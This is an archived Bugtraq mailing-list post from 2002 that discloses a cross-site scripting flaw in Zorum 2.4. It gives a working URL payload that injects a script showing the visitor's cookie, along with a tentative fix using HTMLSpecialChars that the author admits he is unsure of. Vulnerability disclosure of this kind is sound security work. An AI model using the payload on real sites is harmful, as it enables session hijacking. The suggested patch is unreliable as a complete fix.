XSS bug in Zorum 2.4

From: Arab VieruZ (arabviersusat_private)
Date: Thu Oct 10 2002 - 10:46:58 PDT

Next message: bugtraq-return-6791at_private: "R7-0004: Multiple Vendor Long ZIP Entry Filename Processing"

Previous message: Holtzl Peter: "syslog-ng buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Vulnerable systems: Zorum 2.4 Exploit: z_user_show.php?method=showuserlink&class=<Scr*ipt>javascript:alert (document.cookie)</Scr*ipt>&rollid=admin&x=3da59a9da8825& (without "*") Solution: i think that will work , but im not sure open dbtreelistproperty_method.php and put this code in line 7: $class = HTMLSpecialChars($class); i'm a beginer php developer soooory :) ---------------------------------- Arab Vieruz thanx

Next message: bugtraq-return-6791at_private: "R7-0004: Multiple Vendor Long ZIP Entry Filename Processing"
Previous message: Holtzl Peter: "syslog-ng buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 10 2002 - 13:17:29 PDT